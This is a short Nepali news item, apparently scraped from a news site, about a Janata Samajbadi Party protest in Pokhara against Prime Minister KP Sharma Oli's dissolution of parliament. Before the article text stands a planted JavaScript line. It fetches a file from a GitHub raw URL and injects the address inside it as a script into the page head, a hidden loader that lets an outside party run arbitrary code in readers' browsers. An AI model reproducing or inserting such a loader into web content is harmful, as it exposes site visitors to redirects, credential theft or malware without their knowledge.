;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
पुष २९,
काठमाडौं । पोखरामा संसद् बिघटनको बिरोधमा बुधबार पर्दशन गरिएको छ ।
प्रधानमन्त्री केपी शर्मा ओलीले संसद् बिघटन गरेको असंबैधानकिन र आलोकतान्त्रिक भएको भन्दै जनता समाजवादी पार्टीले विशाल जनप्रदर्शनसहित प्रर्दशन गरिएको हो । उनीहरुले प्रतिनिधिसभा विघटन आदेश-खारेज गर! ओली तिम्रो पाराले- दु:ख पाए साराले जस्ता नारबाजी गरेका छन् ।
प्रर्दशनलाई पूर्वप्रधानमन्त्री डा. बाबुराम भट्टराईलगाएतका नेताले सम्बोधन गर्ने छन् ।
फेसबुक प्रतिक्रियाहरु